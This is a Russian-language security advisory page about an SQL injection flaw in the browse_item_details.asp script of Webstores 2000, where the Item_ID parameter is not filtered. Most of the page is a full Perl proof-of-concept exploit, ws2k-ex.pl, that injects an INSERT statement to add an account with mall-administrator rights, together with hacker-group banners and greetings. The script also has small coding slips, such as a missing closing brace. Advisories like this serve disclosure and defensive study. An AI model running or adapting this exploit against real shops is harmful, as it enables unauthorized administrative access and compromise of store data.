SQL инъекция в сценарии browse_item_details.asp в Webstores 2000

Дата публикации:
04.06.2003
Всего просмотров:
1409
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Уязвимость обнаружена в Webstores 2000. Удаленный пользователь может выполнять SQL команды на целевой системе, чтобы получить административный доступ.

Сообщается, что сценарий browse_item_details.asp не фильтрует данные, представленные пользователем. Удаленный пользователь может представить специально обработанный URL, который внедрит SQL команды через 'Item_ID' параметр. Согласно сообщению, уязвимость может использоваться для добавления произвольной учетной записи на системе.

Эксплоит:

ws2k-ex.pl
_START_
#!/usr/bin/perl -w
#This exploit create user with Mall Admin priv. 
#You can login via /MallAdmin/
$pamer = "
1ndonesian Security Team (1st)
==============================
http://bosen.net/releases/

ws2k-ex.pl, WebStore2000 SQL Injection Proof of Concept
Exploit by  : Bosen
Discover by : Bosen
Greetz to   : AresU, TioEuy, syzwz, TioEuy, sakitjiwa, muthafuka 
              all #hackers\@centrin.net.id/austnet.org"; 

use LWP::UserAgent;  
use HTTP::Request;
use HTTP::Response;
$| = 1;
print $pamer;
if ($#ARGV<3){
  print "\n Usage: perl ws2k-ex.pl <uri>\n\n";
  exit;
 
my $legend  = "$ARGV[0]/browse_item_details.asp?Item_ID=";
$legend    .= "''; insert into Mall_Logins values ('bosen','gembel')--";

my $bosen  = LWP::UserAgent->new();
my $gembel = HTTP::Request->new(GET => $legend);
my $dodol  = $bosen->request($gembel);
if ($dodol->is_error()) { printf " %s\n", $dodol->status_line;
} else { print "Alhamdulillah :P\n"; }
print "\n680165\n";
_EOF_
Уязвимость обнаружена в Webstores 2000 6.0

Ссылки: WebStore2000 SQL Injection Vulnerability & Exploit
или введите имя

CAPTCHA